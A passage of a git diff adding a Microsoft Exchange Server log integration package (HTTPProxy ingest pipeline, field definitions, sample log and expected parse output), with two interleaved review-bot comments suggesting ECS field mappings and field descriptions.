@@ -9,7 +9,7 @@ categories: - email_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" icons: @@ -52,6 +52,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -87,6 +88,7 @@ policy_templates: show_user: false default: oauth2/v2.0/token description: Microsoft Identity Platform OAuth2 token endpoint + secret: false - name: azure_resource type: text title: Azure Resource diff --git a/packages/microsoft_exchange_server/_dev/build/build.yml b/packages/microsoft_exchange_server/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/microsoft_exchange_server/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/microsoft_exchange_server/changelog.yml b/packages/microsoft_exchange_server/changelog.yml new file mode 100644 index 00000000000..4de89e3a3af --- /dev/null +++ b/packages/microsoft_exchange_server/changelog.yml @@ -0,0 +1,16 @@ +# newer versions go on top +- version: "0.1.2" + changes: + - description: Fix Recipientstatus field type, add custom processor support & adjust docs + type: bugfix + link: https://github.com/elastic/integrations/pull/9349 +- version: "0.1.1" + changes: + - description: Fix missing Dashboard references + type: enhancement + link: https://github.com/elastic/integrations/pull/9325 +- version: "0.1.0" + changes: + - description: Initial release of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9197 diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..a06dda74051 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-common-config.yml 
@@ -0,0 +1,5 @@
+dynamic_fields:
+ "event.ingested": ".*"
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log
new file mode 100644
index 00000000000..ba3975e6fbe
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log
@@ -0,0 +1 @@
+2024-01-24T15:26:47.957Z,3422ea93-768f-4cd4-8b0c-578038deb0b2,15,1,2507,35,R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6},Mapi,mail.domain.tld,/mapi/emsmdb/,,Negotiate,true,DOMAIN\user,domain.tld,MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro),10.12.13.14,Host123,200,200,,POST,Proxy,Host456.domain.tld,15.01.2507.000,CrossForest,MailboxGuidWithDomain,Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43,,,70,132,,,0,1,,0,,0,,0,0,,0,10,0,0,0,0,3,0,0,0,2,0,10,0,4,7,7,7,10,,?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld,,BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;,,,|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078,,,CafeV1
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log-expected.json b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log-expected.json
new file mode 100644
index 00000000000..55090d00c93
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log-expected.json 
@@ -0,0 +1,94 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-24T15:26:47.957Z", + "event": { + "ingested": "2024-03-06T14:46:17.645261012Z", + "original": "2024-01-24T15:26:47.957Z,3422ea93-768f-4cd4-8b0c-578038deb0b2,15,1,2507,35,R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6},Mapi,mail.domain.tld,/mapi/emsmdb/,,Negotiate,true,DOMAIN\\user,domain.tld,MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro),10.12.13.14,Host123,200,200,,POST,Proxy,Host456.domain.tld,15.01.2507.000,CrossForest,MailboxGuidWithDomain,Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43,,,70,132,,,0,1,,0,,0,,0,0,,0,10,0,0,0,0,3,0,0,0,2,0,10,0,4,7,7,7,10,,?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld,,BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;,,,|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078,,,CafeV1" + }, + "http": { + "request": { + "bytes": 70, + "method": "POST" + }, + "response": { + "bytes": 132, + "status_code": 200 + } + }, + "message": "2024-01-24T15:26:47.957Z,3422ea93-768f-4cd4-8b0c-578038deb0b2,15,1,2507,35,R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6},Mapi,mail.domain.tld,/mapi/emsmdb/,,Negotiate,true,DOMAIN\\user,domain.tld,MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; 
Pro),10.12.13.14,Host123,200,200,,POST,Proxy,Host456.domain.tld,15.01.2507.000,CrossForest,MailboxGuidWithDomain,Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43,,,70,132,,,0,1,,0,,0,,0,0,,0,10,0,0,0,0,3,0,0,0,2,0,10,0,4,7,7,7,10,,?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld,,BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;,,,|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078,,,CafeV1", + "microsoft": { + "exchange": { + "activitycontextlifetime": 10, + "adlatency": 0, + "anchormailbox": "MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e", + "authenticateduser": "DOMAIN\\user", + "authenticationtype": "Negotiate", + "backendcookie": "Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43", + "backendprocessinglatency": 3, + "backendreqinitlatency": 0, + "backendreqstreamlatency": 0, + "backendrespinitlatency": 0, + "backendrespstreamlatency": 0, + "backendstatus": 200, + "buildversion": 2507, + "calculatetargetbackendlatency": 1, + "clientipaddress": [ + "10.12.13.14" + ], + "clientreqstreamlatency": 0, + "clientrequestid": "R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}", + "clientrespstreamlatency": 0, + "corelatency": 7, + "databaseguid": "|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078", + "genericinfo": 
"BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;", + "handlercompletionlatency": 0, + "handlertomoduleswitchinglatency": 0, + "httppipelinelatency": 0, + "httpproxyoverhead": 7, + "isauthenticated": "true", + "kerberosauthheaderlatency": 2, + "logtype": "httpproxy", + "majorversion": 15, + "minorversion": 1, + "moduletohandlerswitchinglatency": 0, + "organization": "domain.tld", + "protocol": "Mapi", + "proxyaction": "Proxy", + "proxytime": 4, + "requesthandlerlatency": 10, + "requestid": "3422ea93-768f-4cd4-8b0c-578038deb0b2", + "revisionversion": 35, + "routinghint": "MailboxGuidWithDomain", + "routinglatency": 7, + "routingstatus": "CafeV1", + "routingtype": "CrossForest", + "targetserver": "Host456.domain.tld", + "targetserverversion": "15.01.2507.000", + "totalaccountforestlatency": 0, + "totalglslatency": 0, + "totalrequesttime": 10, + "totalresourceforestlatency": 0, + "totalsharedcachelatency": 0, + "urlhost": "mail.domain.tld", + "urlstem": "/mapi/emsmdb/" + } + }, + "observer": { + "hostname": "Host123" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "query": "?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld" + }, + "user": { + "name": "user" + }, + "user_agent": { + "original": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro)" + } + } + ] +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/httpproxy/agent/stream/filestream.yml.hbs new file mode 100644 index 00000000000..9c5a9235ed8 --- /dev/null 
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/agent/stream/filestream.yml.hbs
@@ -0,0 +1,17 @@
+paths:
+{{#each paths as |path i|}}
+ - {{path}}
+{{/each}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag i|}}
+ - {{tag}}
+{{/each}}
+exclude_files: [".gz$"]
+processors:
+ - add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..fd606c91250
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,285 @@
+---
+description: Pipeline for processing Exchange Server HTTPProxy Logs
+processors:
+- drop:
+ if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/"
+- set:
+ field: event.original
+ copy_from: message
+- csv:
+ field: event.original
+ ignore_failure: true
+ ignore_missing: true
+ target_fields:
+ - "@timestamp"
+ - microsoft.exchange.requestid
+ - microsoft.exchange.majorversion
+ - microsoft.exchange.minorversion
+ - microsoft.exchange.buildversion
+ - microsoft.exchange.revisionversion
+ - microsoft.exchange.clientrequestid
+ - microsoft.exchange.protocol
+ - microsoft.exchange.urlhost
+ - microsoft.exchange.urlstem
+ - microsoft.exchange.protocolaction
+ - microsoft.exchange.authenticationtype
+ - microsoft.exchange.isauthenticated
+ - microsoft.exchange.authenticateduser
+ - microsoft.exchange.organization
+ - microsoft.exchange.anchormailbox
+ - user_agent.original
+ - microsoft.exchange.clientipaddress
+ - observer.hostname
+ - http.response.status_code
+ - microsoft.exchange.backendstatus
+ - microsoft.exchange.errorcode
+ - http.request.method
+ - microsoft.exchange.proxyaction
+ - microsoft.exchange.targetserver
+ - microsoft.exchange.targetserverversion
+ - microsoft.exchange.routingtype
+ - microsoft.exchange.routinghint
+ - microsoft.exchange.backendcookie
+ - microsoft.exchange.serverlocatorhost
+ - microsoft.exchange.serverlocatorlatency
+ - http.request.bytes
+ - http.response.bytes
+ - microsoft.exchange.targetoutstandingrequests
+ - microsoft.exchange.authmoduleperfcontext
+ - microsoft.exchange.httppipelinelatency
+ - microsoft.exchange.calculatetargetbackendlatency
+ - microsoft.exchange.glslatencybreakup
+ - microsoft.exchange.totalglslatency
+ - microsoft.exchange.accountforestlatencybreakup
+ - microsoft.exchange.totalaccountforestlatency
+ - microsoft.exchange.resourceforestlatencybreakup
+ - microsoft.exchange.totalresourceforestlatency
+ - microsoft.exchange.adlatency
+ - microsoft.exchange.sharedcachelatencybreakup
+ - microsoft.exchange.totalsharedcachelatency
+ - microsoft.exchange.activitycontextlifetime
+ - microsoft.exchange.moduletohandlerswitchinglatency
+ - microsoft.exchange.clientreqstreamlatency
+ - microsoft.exchange.backendreqinitlatency
+ - microsoft.exchange.backendreqstreamlatency
+ - microsoft.exchange.backendprocessinglatency
+ - microsoft.exchange.backendrespinitlatency
+ - microsoft.exchange.backendrespstreamlatency
+ - microsoft.exchange.clientrespstreamlatency
+ - microsoft.exchange.kerberosauthheaderlatency
+ - microsoft.exchange.handlercompletionlatency
+ - microsoft.exchange.requesthandlerlatency
+ - microsoft.exchange.handlertomoduleswitchinglatency
+ - microsoft.exchange.proxytime
+ - microsoft.exchange.corelatency
+ - microsoft.exchange.routinglatency
+ - microsoft.exchange.httpproxyoverhead
+ - microsoft.exchange.totalrequesttime
+ - microsoft.exchange.routerefresherlatency
+ - url.query
+ - microsoft.exchange.backendgenericinfo
+ - microsoft.exchange.genericinfo
+ - microsoft.exchange.genericerrors
+ - microsoft.exchange.edgetraceid
+ - microsoft.exchange.databaseguid
+ - microsoft.exchange.useradobjectguid
+ - microsoft.exchange.partitionendpointlookuplatency
+ - microsoft.exchange.routingstatus
+- set:
+ field: microsoft.exchange.logtype
+ value: httpproxy
+ ignore_empty_value: true
+ ignore_failure: true
+- grok:
+ field: microsoft.exchange.authenticateduser
+ patterns:
+ - "%{DATA}\\\\%{NOTSPACE:user.name}"
+ ignore_failure: true
+ ignore_missing: true
+- grok:
+ field: microsoft.exchange.clientipaddress
+ patterns:
+ - "^%{IP:microsoft.exchange.clientipaddress_external}%{SPACE}%{IP:microsoft.exchange.clientipaddress_internal}$"
+ ignore_failure: true
+ ignore_missing: true
+- split:
+ field: microsoft.exchange.clientipaddress
+ separator: " "
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "http.request.bytes"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "http.response.bytes"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "http.response.status_code"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.adlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.backendprocessinglatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.backendreqinitlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.backendreqstreamlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.backendrespinitlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.backendrespstreamlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.backendstatus"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.buildversion"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.calculatetargetbackendlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.clientreqstreamlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.clientrespstreamlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.corelatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.handlercompletionlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.handlertomoduleswitchinglatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.httppipelinelatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.kerberosauthheaderlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.majorversion"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.minorversion"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.moduletohandlerswitchinglatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.requesthandlerlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.revisionversion"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.routinglatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.totalaccountforestlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.totalglslatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.totalrequesttime"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.totalresourceforestlatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.totalsharedcachelatency"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.activitycontextlifetime"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.httpproxyoverhead"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- convert:
+ field: "microsoft.exchange.proxytime"
+ type: long
+ ignore_failure: true
+ ignore_missing: true
+- set:
+ field: event.ingested
+ copy_from: _ingest.timestamp
+ ignore_failure: true
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/ecs.yml
new file mode 100644
index 00000000000..2b27b8981dd
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/ecs.yml
@@ -0,0 +1,20 @@
+- external: ecs
+ name: message
+- external: ecs
+ name: http.response.status_code
+- external: ecs
+ name: url.query
+- external: ecs
+ name: http.request.method
+- external: ecs
+ name: user_agent.original
+- external: ecs
+ name: http.response.bytes
+- external: ecs
+ name: http.request.bytes
+- external: ecs
+ name: observer.hostname
+- external: ecs
+ name: tags
+- external: ecs
+ name: user.name
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/fields.yml
new file mode 100644
index 00000000000..fff82215084
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/fields.yml
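Review bot: The client address — the field most detection content keys on — is left only in the custom `microsoft.exchange.clientipaddress` (plus the grok-derived `_external`/`_internal` fields); nothing in this pipeline populates ECS `source.ip` or `related.ip`, and the `authenticateduser` grok pattern `%{DATA}\\\\%{NOTSPACE:user.name}` discards the domain before the backslash instead of mapping it to `user.domain`. Detection rules and dashboards written against ECS will therefore not match HTTPProxy events even though the data is present. Consider capturing the domain in the grok and copying the first client address into `source.ip`/`related.ip` and the user into `related.user`, with matching `external: ecs` entries for those fields in the data stream's `ecs.yml`; the pipeline ends in this hunk, so the additions can go just before the final `event.ingested` set. A smaller item: in the first `drop` processor, `ctx.message =~ /^#/` is already covered by `/^[^0-9]/` and can be dropped.

```yaml
- grok:
    field: microsoft.exchange.authenticateduser
    patterns:
      - "%{DATA:user.domain}\\\\%{NOTSPACE:user.name}"
    ignore_failure: true
    ignore_missing: true
# … unchanged: clientipaddress grok/split and the convert processors …
- set:
    field: source.ip
    copy_from: microsoft.exchange.clientipaddress.0
    ignore_empty_value: true
    ignore_failure: true
- append:
    field: related.ip
    value: "{{{source.ip}}}"
    allow_duplicates: false
    if: ctx.source?.ip != null
- append:
    field: related.user
    value: "{{{user.name}}}"
    allow_duplicates: false
    if: ctx.user?.name != null
- set:
    field: event.ingested
    copy_from: _ingest.timestamp
    ignore_failure: true
```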
@@ -0,0 +1,138 @@
+- name: microsoft.exchange.requestid
+ type: keyword
+- name: microsoft.exchange.majorversion
+ type: long
+- name: microsoft.exchange.minorversion
+ type: long
+- name: microsoft.exchange.buildversion
+ type: long
+- name: microsoft.exchange.revisionversion
+ type: long
+- name: microsoft.exchange.clientrequestid
+ type: keyword
+- name: microsoft.exchange.protocol
+ type: keyword
+- name: microsoft.exchange.urlhost
+ type: keyword
+- name: microsoft.exchange.urlstem
+ type: keyword
+- name: microsoft.exchange.protocolaction
+ type: keyword
+- name: microsoft.exchange.authenticationtype
+ type: keyword
+- name: microsoft.exchange.isauthenticated
+ type: keyword
+- name: microsoft.exchange.authenticateduser
+ type: keyword
+- name: microsoft.exchange.organization
+ type: keyword
+- name: microsoft.exchange.anchormailbox
+ type: keyword
+- name: microsoft.exchange.clientipaddress
+ type: ip
+- name: microsoft.exchange.backendstatus
+ type: long
+- name: microsoft.exchange.errorcode
+ type: keyword
+- name: microsoft.exchange.proxyaction
+ type: keyword
+- name: microsoft.exchange.targetserver
+ type: keyword
+- name: microsoft.exchange.targetserverversion
+ type: keyword
+- name: microsoft.exchange.routingtype
+ type: keyword
+- name: microsoft.exchange.routinghint
+ type: keyword
+- name: microsoft.exchange.backendcookie
+ type: keyword
+- name: microsoft.exchange.serverlocatorhost
+ type: keyword
+- name: microsoft.exchange.serverlocatorlatency
+ type: long
+- name: microsoft.exchange.targetoutstandingrequests
+ type: keyword
+- name: microsoft.exchange.authmoduleperfcontext
+ type: keyword
+- name: microsoft.exchange.httppipelinelatency
+ type: long
+- name: microsoft.exchange.calculatetargetbackendlatency
+ type: long
+- name: microsoft.exchange.glslatencybreakup
+ type: keyword
+- name: microsoft.exchange.totalglslatency
+ type: long
+- name: microsoft.exchange.accountforestlatencybreakup
+ type: keyword
+- name: 
microsoft.exchange.totalaccountforestlatency
+ type: long
+- name: microsoft.exchange.resourceforestlatencybreakup
+ type: keyword
+- name: microsoft.exchange.totalresourceforestlatency
+ type: long
+- name: microsoft.exchange.adlatency
+ type: long
+- name: microsoft.exchange.sharedcachelatencybreakup
+ type: keyword
+- name: microsoft.exchange.totalsharedcachelatency
+ type: long
+- name: microsoft.exchange.activitycontextlifetime
+ type: long
+- name: microsoft.exchange.moduletohandlerswitchinglatency
+ type: long
+- name: microsoft.exchange.clientreqstreamlatency
+ type: long
+- name: microsoft.exchange.backendreqinitlatency
+ type: long
+- name: microsoft.exchange.backendreqstreamlatency
+ type: long
+- name: microsoft.exchange.backendprocessinglatency
+ type: long
+- name: microsoft.exchange.backendrespinitlatency
+ type: long
+- name: microsoft.exchange.backendrespstreamlatency
+ type: long
+- name: microsoft.exchange.clientrespstreamlatency
+ type: long
+- name: microsoft.exchange.kerberosauthheaderlatency
+ type: long
+- name: microsoft.exchange.handlercompletionlatency
+ type: long
+- name: microsoft.exchange.requesthandlerlatency
+ type: long
+- name: microsoft.exchange.handlertomoduleswitchinglatency
+ type: long
+- name: microsoft.exchange.proxytime
+ type: long
+- name: microsoft.exchange.corelatency
+ type: long
+- name: microsoft.exchange.routinglatency
+ type: long
+- name: microsoft.exchange.httpproxyoverhead
+ type: long
+- name: microsoft.exchange.totalrequesttime
+ type: long
+- name: microsoft.exchange.routerefresherlatency
+ type: long
+- name: microsoft.exchange.backendgenericinfo
+ type: keyword
+- name: microsoft.exchange.genericinfo
+ type: keyword
+- name: microsoft.exchange.genericerrors
+ type: keyword
+- name: microsoft.exchange.edgetraceid
+ type: keyword
+- name: microsoft.exchange.databaseguid
+ type: keyword
+- name: microsoft.exchange.useradobjectguid
+ type: keyword
+- name: microsoft.exchange.partitionendpointlookuplatency
+ 
type: long
+- name: microsoft.exchange.routingstatus
+ type: keyword
+- name: microsoft.exchange.logtype
+ type: keyword
+- name: microsoft.exchange.clientipaddress_external
+ type: ip
+- name: microsoft.exchange.clientipaddress_internal
+ type: ip
diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/manifest.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/manifest.yml
new file mode 100644
index 00000000000..b071ff6add2
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/httpproxy/manifest.yml
@@ -0,0 +1,29 @@
+title: "Exchange HTTPProxy"
+type: logs
+streams:
+ - input: filestream
+ title: Exchange HTTPProxy Logs
+ description: Collects HTTPProxy Logs
+ vars:
+ - name: paths
+ type: text
+ title: Paths
+ required: true
+ multi: true
+ show_user: true
+ default:
+ - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\\*\\*.LOG"
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: false
+ show_user: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..a06dda74051
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,5 @@
+dynamic_fields:
+ "event.ingested": ".*"
+fields:
+ tags:
+ - preserve_original_event
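Review bot: None of the 69 fields in httpproxy/fields/fields.yml carries a `description`, while the adjacent base-fields.yml documents each of its four; abbreviated names such as `glslatencybreakup`, `backendcookie`, `authmoduleperfcontext` and `routinghint` are opaque without one, and the package's generated field reference will be blank for them. A one-line `description:` under each `type:` line is all the tooling needs, and the `ip`-typed entries (`clientipaddress`, `clientipaddress_external`, `clientipaddress_internal`) in particular should say what distinguishes them, since that is what an analyst will pivot on. imap4_pop3/fields/fields.yml further down has the same gap (`cip`, `sip`, `rqsize`, `rpsize`, `puid`).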
diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json
new file mode 100644
index 00000000000..6275f53cc8e
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json
